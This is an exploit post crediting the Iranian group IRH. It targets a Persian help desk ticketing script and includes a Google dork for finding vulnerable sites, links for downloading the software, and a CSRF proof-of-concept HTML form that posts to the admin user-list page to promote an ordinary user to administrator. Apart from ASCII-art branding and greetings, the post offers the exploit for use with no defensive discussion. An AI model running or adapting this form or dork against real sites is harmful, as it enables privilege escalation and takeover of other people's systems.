**************************************************
IIIIIIII  RRRRRRRRRRRR        HHHHHHHH    HHHHHHHH
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRRRRRRRR          HHHHHHHHHHHHHHHH  
  IIII      RRRR  RRRR          HHHH        HHHH  
  IIII      RRRR  RRRR          HHHH        HHHH  
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
IIIIIIII  RRRRRRRR    RRRRRR  HHHHHHHH    HHHHHHHH
***************************************************

# Exploit Title: Help desk customer service ticket System v.1.0 CSRF Vulnerability

# Google Dork: inurl:?L=login   inurl:?L=admin.user.list

# Date: 2014

# Exploit Author: IRH

# Version: v.1.0
 
# Tested on: BT , 7

# Software Link: http://www.persianscript.ir/1389/08/06/help-desk-customer-service-ticket-system/

# Download Vulnerability Script : http://www.dl.persianscript.ir/script/persian-ticket-script%28PersianScript.ir%29.zip

# Screen shot: http://cld.persiangig.com/preview/9FtH6IJJjk/190.png


***************************************************

Exploit :


<html>

<body>

<form action="http://localhost/support/?L=admin.user.list" method="post" name="main" id="main">

<input type="hidden" name="userid" value="1124">

<input type="button" name="makeadmin" value="+Admin">

<input type="submit" name="Submit" value="Send">

</form>  

</body>

</html>



*********

info :

change Normal user to admin user with this exploit :D



TnX To :

MojiRider , V30sharp , Black.viper , Zer0killer , SecretWalker , FarBodEzrail , Amirio , AL1R3​Z4, 3is@ , 
Mr.a!i , Mr.3ler0n , Irblackhat , inj3ct0r , 3inst3in , Remot3r , Scoot3r , Black_king , IRH Member
  
./IRaNHaCK.org